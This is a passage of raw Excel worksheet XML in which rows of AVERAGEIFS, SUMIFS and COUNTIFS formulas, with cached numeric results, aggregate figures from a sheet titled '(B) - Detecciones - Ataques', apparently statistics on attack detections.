        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>11.5</v>
      </c>
      <c r="CQ144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.001093742224</v>
      </c>
      <c r="CT144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.001996007984</v>
      </c>
      <c r="CU144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>16</v>
      </c>
      <c r="CZ144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ144" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0.09090909091</v>
      </c>
      <c r="DK144" s="271"/>
    </row>
    <row r="145">
      <c r="J145" s="277"/>
      <c r="K145" s="512"/>
      <c r="L145" s="512"/>
      <c r="M145" s="512"/>
      <c r="N145" s="512"/>
      <c r="O145" s="278"/>
      <c r="Q145" s="271"/>
      <c r="R145" s="352" t="s">
        <v>2565</v>
      </c>
      <c r="S145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.3407274045</v>
      </c>
      <c r="T145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="U145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>1.168859649</v>
      </c>
      <c r="V145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>3.90625</v>
      </c>
      <c r="W145" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>13</v>
      </c>
      <c r="X145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>7633.714286</v>
      </c>
      <c r="Y145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>80.46666667</v>
      </c>
      <c r="Z145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>8328.985411</v>
      </c>
      <c r="AA145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>1.400484678</v>
      </c>
      <c r="AB145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>22.203125</v>
      </c>
      <c r="AC145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>5.4</v>
      </c>
      <c r="AD145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.9265137086</v>
      </c>
      <c r="AE145" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>7.64</v>
      </c>
      <c r="AF145" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DE$3:$DE$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>3.933301585</v>
      </c>
      <c r="AG145" s="271"/>
      <c r="AH145" s="352" t="s">
        <v>2565</v>
      </c>
      <c r="AI145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.1814548091</v>
      </c>
      <c r="AJ145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>1.5</v>
      </c>
      <c r="AL145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="AN145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3710526316</v>
      </c>
      <c r="AR145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>1.166666667</v>
      </c>
      <c r="AS145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>2</v>
      </c>
      <c r="AU145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>3.5</v>
      </c>
      <c r="AV145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.625</v>
      </c>
      <c r="AY145" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>13</v>
      </c>
      <c r="BB145" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>17812</v>
      </c>
      <c r="BD145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>396</v>
      </c>
      <c r="BI145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>14976.65935</v>
      </c>
      <c r="BN145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>1060.391166</v>
      </c>
      <c r="BO145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>4.5</v>
      </c>
      <c r="BT145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.08130081301</v>
      </c>
      <c r="CA145" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC145" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>3</v>
      </c>
      <c r="CG145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>13</v>
      </c>
      <c r="CL145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>81</v>
      </c>
      <c r="CN145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>2</v>
      </c>
      <c r="CP145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>20</v>
      </c>
      <c r="CQ145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.0622922556</v>
      </c>
      <c r="CT145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.007984031936</v>
      </c>
      <c r="CU145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX145" s="518">
